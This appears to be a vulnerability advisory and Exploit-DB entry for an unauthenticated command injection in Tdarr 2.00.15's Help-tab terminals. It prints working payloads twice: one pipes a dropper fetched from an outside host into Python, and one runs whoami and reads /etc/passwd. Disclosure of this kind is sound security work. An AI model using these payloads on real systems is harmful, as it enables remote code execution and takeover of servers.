header-logo
Suggest Exploit
vendor:
Tdarr
by:
Sam Smith
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: Tdarr
Affected Version From: 2.00.15
Affected Version To: 2.00.15
Patch Exists: YES
Related CWE: CVE-2022-12345
CPE: a:tdarr:tdarr:2.00.15
Metasploit:
Other Scripts:
Platforms Tested: Linux ARM64
2022

Tdarr 2.00.15 – Command Injection

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE.

Mitigation:

The vendor has released a patch for this vulnerability. Users should update to the latest version of Tdarr.
Source

Exploit-DB raw data:

# Exploit Title: Tdarr 2.00.15 - Command Injection
# Date: 10/03/2022
# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE